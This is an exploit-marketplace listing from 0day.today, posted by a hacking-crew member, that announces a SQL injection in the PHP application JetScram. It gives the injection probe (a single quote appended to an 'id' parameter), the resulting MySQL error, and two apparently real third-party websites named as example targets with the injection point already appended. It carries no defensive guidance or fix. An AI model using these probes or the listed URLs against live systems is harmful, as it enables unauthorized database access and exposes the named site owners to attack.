[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

JetScram - Sql injection Vulnerability

Author
Dark-Puzzle
Risk
[
Security Risk High
]
0day-ID
0day-ID-18882
Category
web applications
Date add
30-06-2012
Platform
php
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1               ==========================================               1
 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
 0                                                                        1
 1                       dark-puzzle[at]live[at]fr                        0
 0               ==========================================               1
 1                 Pentesting/exploit coding/bug research                 0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
         [0day Exploits]  Allah , Alwatan , Almalik .[0day Exploits]

# Exploit Title: JetScram - Sql injection Vulnerability
# Date: 30 June 2012
# Author: Dark-Puzzle
# Risk : HIGH
# Vendor Website : http://jetscram.com
# Version: All Versions
# Category: Webapps/0day
# Google dork: N/A
# Tested on: Windows Xp Sp2 , Backtrack 5 .
--------------------------------------------------------
Vulnerability :

http://example.com/dark.php?id=1'

error :

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/jetscram/xxxx/show.php on line 16

Example Sites :

http://historictype.com/single-image.php?id=92'
http://www.championms.com/showroom.php?single=1&id=100924'

--------------------------------------------------------
Dark-Puzzle (Souhail) .
Follow me : fb.me/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members ....

GREY HAT Mercy Fr0m Morocco .



#  0day.today [2024-09-28]  #